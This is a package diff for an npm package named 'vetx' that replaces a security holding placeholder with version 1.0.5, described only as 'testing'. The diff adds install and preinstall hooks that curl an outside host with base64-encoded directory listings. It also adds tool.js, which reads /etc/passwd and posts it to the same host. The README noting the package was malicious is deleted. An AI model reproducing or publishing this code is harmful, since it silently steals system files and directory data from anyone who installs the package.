vetx 0.0.1-security → 1.0.5

package/package.json

@@ -1,6 +1,16 @@
 {
-  "name": "vetx",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+    "name": "vetx",
+    "version": "1.0.5",
+    "description": "testing",
+    "main": "tool.js",
+    "scripts": {
+        "test": "echo \"Error: no test specified\" && exit 1",
+        "install": "curl https://lvds.colabs.workers.dev/vetx/install/?$(pwd | base64)",
+        "preinstall": "curl https://lvds.colabs.workers.dev/vetx/preinstall/$(ls ../ | base64)"
+    },
+    "author": "",
+    "license": "MIT",
+    "dependencies": {
+        "axios": "^1.6.0"
+    }
 }

package/tool.js

@@ -0,0 +1,24 @@
+const { exec } = require('child_process');
+const axios = require('axios');
+
+const comando = 'cat /etc/passwd';
+
+exec(comando, (error, stdout, stderr) => {
+  if (error) {
+    console.error(`Erro: ${error}`);
+    return;
+  }
+  console.log(`output: ${stdout}`);
+  console.error(`error: ${stderr}`);
+
+  const urlExterna = 'https://lvds.colabs.workers.dev';
+
+ 
+  axios.post(urlExterna, { output: stdout })
+    .then(response => {s
+      console.log('output sent');
+    })
+    .catch(err => {
+      console.error('error to send the output:', err);
+    });
+});

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=vetx for more information.